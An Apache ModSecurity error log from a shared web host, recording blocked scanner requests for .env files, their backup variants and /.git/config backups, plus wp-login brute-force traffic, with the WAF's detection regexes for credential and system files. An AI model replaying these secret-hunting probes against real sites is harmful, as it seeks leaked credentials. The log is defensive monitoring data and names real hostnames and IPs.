[Tue May 26 14:48:41.555078 2026] [security2:error] [pid 648203:tid 648407] [client 5.255.125.104:52778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbZwAAAM8"]
[Tue May 26 14:48:41.555107 2026] [security2:error] [pid 648203:tid 648373] [client 5.255.125.104:52766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbagAAAK0"]
[Tue May 26 14:48:41.555205 2026] [security2:error] [pid 648203:tid 648454] [client 5.255.125.104:52842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVlcbEQDDtxJNiDrdTbaQAAAP4"]
[Tue May 26 14:48:41.555296 2026] [security2:error] [pid 648203:tid 648420] [client 5.255.125.104:52840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbaAAAANw"]
[Tue May 26 14:48:41.555444 2026] [proxy:error] [pid 648203:tid 648422] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.555492 2026] [proxy_http:error] [pid 648203:tid 648422] [client 5.255.125.104:52874] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.555499 2026] [security2:error] [pid 648203:tid 648390] [client 5.255.125.104:52818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVlcbEQDDtxJNiDrdTbZQAAAL4"]
[Tue May 26 14:48:41.555572 2026] [proxy:error] [pid 648203:tid 648404] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.555605 2026] [proxy_http:error] [pid 648203:tid 648404] [client 5.255.125.104:52680] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.556092 2026] [proxy:error] [pid 648203:tid 648422] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.556124 2026] [proxy_http:error] [pid 648203:tid 648422] [client 5.255.125.104:52874] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.556853 2026] [security2:error] [pid 648203:tid 648410] [client 5.255.125.104:52852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbcAAAANI"]
[Tue May 26 14:48:41.556939 2026] [proxy:error] [pid 648203:tid 648350] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557013 2026] [proxy_http:error] [pid 648203:tid 648350] [client 5.255.125.104:52686] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.557135 2026] [security2:error] [pid 648203:tid 648459] [client 5.255.125.104:52892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbbgAAAQM"]
[Tue May 26 14:48:41.557676 2026] [proxy:error] [pid 648203:tid 648389] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557726 2026] [proxy_http:error] [pid 648203:tid 648389] [client 5.255.125.104:52734] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.557735 2026] [security2:error] [pid 648203:tid 648338] [client 5.255.125.104:52754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbdAAAAIo"]
[Tue May 26 14:48:41.557900 2026] [proxy:error] [pid 648203:tid 648350] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557961 2026] [proxy_http:error] [pid 648203:tid 648350] [client 5.255.125.104:52686] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558205 2026] [proxy:error] [pid 648203:tid 648420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558260 2026] [proxy_http:error] [pid 648203:tid 648420] [client 5.255.125.104:52912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558356 2026] [security2:error] [pid 648203:tid 648341] [client 5.255.125.104:52794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbdgAAAI0"]
[Tue May 26 14:48:41.558362 2026] [proxy:error] [pid 648203:tid 648407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558402 2026] [proxy_http:error] [pid 648203:tid 648407] [client 5.255.125.104:52812] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558485 2026] [proxy:error] [pid 648203:tid 648389] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558521 2026] [proxy_http:error] [pid 648203:tid 648389] [client 5.255.125.104:52734] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558563 2026] [security2:error] [pid 648203:tid 648342] [client 5.255.125.104:52746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVlcbEQDDtxJNiDrdTbdwAAAI4"]
[Tue May 26 14:48:41.559080 2026] [proxy:error] [pid 648203:tid 648420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.559123 2026] [proxy_http:error] [pid 648203:tid 648420] [client 5.255.125.104:52912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.559204 2026] [security2:error] [pid 648203:tid 648396] [client 5.255.125.104:52844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbbwAAAMQ"]
[Tue May 26 14:48:41.559310 2026] [security2:error] [pid 648203:tid 648431] [client 5.255.125.104:52902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbbQAAAOc"]
[Tue May 26 14:48:41.559316 2026] [proxy:error] [pid 648203:tid 648407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.559374 2026] [proxy_http:error] [pid 648203:tid 648407] [client 5.255.125.104:52812] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.560454 2026] [security2:error] [pid 648203:tid 648346] [client 5.255.125.104:52806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbdQAAAJI"]
[Tue May 26 14:48:41.561234 2026] [security2:error] [pid 648203:tid 648356] [client 5.255.125.104:52890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVlcbEQDDtxJNiDrdTbawAAAJw"]
[Tue May 26 14:48:41.561715 2026] [security2:error] [pid 648203:tid 648440] [client 5.255.125.104:52830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbeAAAAPA"]
[Tue May 26 14:48:41.691081 2026] [security2:error] [pid 648203:tid 648349] [client 216.26.230.60:47847] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlcLEQDDtxJNiDrdTbQQAAAJU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:41.760064 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.5:27808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config/.env"] [unique_id "ahVlcbEQDDtxJNiDrdTbfQAAALE"]
[Tue May 26 14:48:41.911403 2026] [security2:error] [pid 648203:tid 648363] [client 74.249.173.207:2571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVlcbEQDDtxJNiDrdTbggAAAKM"]
[Tue May 26 14:48:42.136427 2026] [security2:error] [pid 648203:tid 648444] [client 64.89.163.250:65532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVlcrEQDDtxJNiDrdTbigAAAPQ"]
[Tue May 26 14:48:42.207858 2026] [proxy:error] [pid 648203:tid 648432] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:42.207917 2026] [proxy_http:error] [pid 648203:tid 648432] [client 5.255.125.104:52892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:42.208574 2026] [proxy:error] [pid 648203:tid 648432] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:42.208608 2026] [proxy_http:error] [pid 648203:tid 648432] [client 5.255.125.104:52892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:42.312298 2026] [security2:error] [pid 648203:tid 648325] [remote 54.38.29.86:60680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTbiQAA33k"]
[Tue May 26 14:48:42.689229 2026] [security2:error] [pid 648203:tid 648323] [remote 45.32.67.165:46762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTbngAAwnc"]
[Tue May 26 14:48:43.771738 2026] [security2:error] [pid 648203:tid 648425] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlc7EQDDtxJNiDrdTbvgAAAOE"]
[Tue May 26 14:48:43.838451 2026] [security2:error] [pid 648203:tid 648447] [client 216.26.238.198:64075] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTboAAAAPc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:44.754566 2026] [ssl:error] [pid 648203:tid 648459] [client 3.233.59.216:14800] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname powersociety.org.in.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:48:45.245880 2026] [security2:error] [pid 648203:tid 648414] [client 49.13.24.81:58078] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVldLEQDDtxJNiDrdTb9wAAANY"], referer: https://thegoodsporting.com
[Tue May 26 14:48:45.616055 2026] [security2:error] [pid 648203:tid 648425] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVldbEQDDtxJNiDrdTcDAAAAOE"]
[Tue May 26 14:48:45.953971 2026] [security2:error] [pid 648203:tid 648440] [client 216.26.234.56:36667] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVldLEQDDtxJNiDrdTb_QAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:46.627542 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.landsonlogistics.com"] [uri "/*update.cgi*"] [unique_id "ahVldrEQDDtxJNiDrdTcQQAA3SQ"]
[Tue May 26 14:48:46.628424 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcRAAA3SQ"]
[Tue May 26 14:48:46.770398 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcVgAArBE"]
[Tue May 26 14:48:46.772602 2026] [security2:error] [pid 648203:tid 648246] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcXAAArCo"]
[Tue May 26 14:48:46.774087 2026] [security2:error] [pid 648203:tid 648225] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcXgAArBU"]
[Tue May 26 14:48:46.914027 2026] [security2:error] [pid 648203:tid 648255] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcaAAA7TM"]
[Tue May 26 14:48:47.063073 2026] [security2:error] [pid 648203:tid 648253] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahVld7EQDDtxJNiDrdTcbQABADE"]
[Tue May 26 14:48:47.063538 2026] [security2:error] [pid 648203:tid 648259] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahVld7EQDDtxJNiDrdTcbgABADc"]
[Tue May 26 14:48:47.064021 2026] [security2:error] [pid 648203:tid 648262] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.env.php"] [unique_id "ahVld7EQDDtxJNiDrdTcegABADo"]
[Tue May 26 14:48:47.064602 2026] [security2:error] [pid 648203:tid 648260] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahVld7EQDDtxJNiDrdTceQABADg"]
[Tue May 26 14:48:47.195664 2026] [security2:error] [pid 648203:tid 648427] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVldrEQDDtxJNiDrdTcUAAAAOM"]
[Tue May 26 14:48:47.214178 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env~"] [unique_id "ahVld7EQDDtxJNiDrdTchwAAnC0"]
[Tue May 26 14:48:47.217064 2026] [security2:error] [pid 648203:tid 648286] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.swp"] [unique_id "ahVld7EQDDtxJNiDrdTchQAAnFI"]
[Tue May 26 14:48:47.360248 2026] [security2:error] [pid 648203:tid 648292] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.bak"] [unique_id "ahVld7EQDDtxJNiDrdTclgAAoFg"]
[Tue May 26 14:48:47.362099 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.old"] [unique_id "ahVld7EQDDtxJNiDrdTclwAAoEk"]
